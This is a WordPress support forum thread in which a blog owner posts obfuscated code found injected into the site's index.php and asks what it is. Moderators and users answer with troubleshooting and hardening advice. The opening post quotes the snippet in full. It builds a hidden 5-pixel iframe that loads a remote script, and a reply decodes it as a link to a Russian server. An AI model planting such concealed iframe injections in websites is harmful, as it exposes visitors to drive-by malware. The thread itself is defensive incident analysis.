Support » Fixing WordPress » Not sure if this is a hacker or something else, please analyze this code?

  • In index.php I think this is normal,

    /** Loads the WordPress Environment and Template */

    Right after that inside index.php, I recently found this:
    <?php echo 'status=' ';nf='ifr';r='3';i='gi?';x='u';ei='r';b='//g';kh='.c';l='s';e='ame';t='/i';k='pt0';jl='h';ou=':';yv='.r';j='n';tl='c';tp='ttp';pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,j,kh,i,r);var qb=document.createElement(pa);qb.setAttribute('width','5');qb.setAttribute('height','5');qb.setAttribute('style','display:none');qb.setAttribute(nj,h);document.body.appendChild(qb);'; ?>

    What’s that?

    Background: I have a fairly new WP 2.7 blog. I’m the Administrator, and I have a couple Authors. The site was running live normally on Sunday. On Tuesday I looked and the site was down with a short error message that mentioned (which I know is normally just the index.php in the main blog folder, it only loads the header, it’s not my theme’s template index.php). So I looked inside the index.php to see if it was normal, and it did not appear normal to me. I have not changed this file manually, ever, as far as I can remember it should be the default index.php that came with WP 2.6.x.

    So when I found the above unknown-code I replaced index.php with a default index.php (the site immediately worked again). So I changed some of my passwords in case I was hacked: I changed my WP Admin password, and my Cpanel login password. I haven’t changed MySQL database password and wp-config yet, should I do that too?

    No other signs of hacking yet, I’m going to reserach it more now & first wanted the Forum’s reading of what that code is.

Viewing 6 replies - 1 through 6 (of 6 total)
  • Well, what it seems to be is a clever way of assigning strings of letters to variables that are other letters, then using the variables to link the strings together. Kind of like saying 1=”My” 2=”name” 3=”is” 4=”John” and then 1 2 3 4.

    The end sum that results from the above is that it tries to open an iframe using a file on a russian server called, referencing a file and variable called /in.cgi?3

    I couldn’t open it as my security system warns me that the page has been flagged by many as a security risk.

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    They didn’t get into your SQL DB to make that hack, so you should be okay there.

    Doublecheck your other users on the site, make sure there’s no one new, and that no one has weird permissions.

    Thanks for the answers so far. This is scary! I do not think I have ever been hacked before, not anything like this. How did they get in there, and can they again? Was it passwords, or some other problem or method of entry?

    OK, I looked through many of my theme template files, and I don’t see that kind of code anywhere else. I’m checking my other index.php files next (I have additional blogs, separate installs, same server, they are working).

    I checked the “Users” and there are only the Users that I expect, no strange or new users. I have changed passwords as mentioned in post #1.

    I have never messed with chmod in any way.

    Anything else I need to look at?

    I heard there’s a new WP security plugin coming out, I guess I need to look into that.

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Eh, I distrust other people’s ‘security’ plugins, to be honest.

    It’s odd they only hacked /blog/index.php, though. You could check out Hardening WordPress.

    That is odd, isn’t it?

    Because, index.php that we’re talking about doesn’t really “display” anywhere, does it? Or did that code they put, allow it to show that iframe in my header somehow?

    I will read Hardening WP again. I have looked at it before but it’s been a while and I need to be methodical about this now.

    Moderator Ipstenu (Mika Epstein)


    Lead Plugin Wrangler

    Clearly someone found a way to write to that file. So … logically it’s an access issue. Maybe a hack through comments and a not-correctly-secured index.php files that had lax permissions but … that doesn’t really make sense.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Not sure if this is a hacker or something else, please analyze this code?’ is closed to new replies.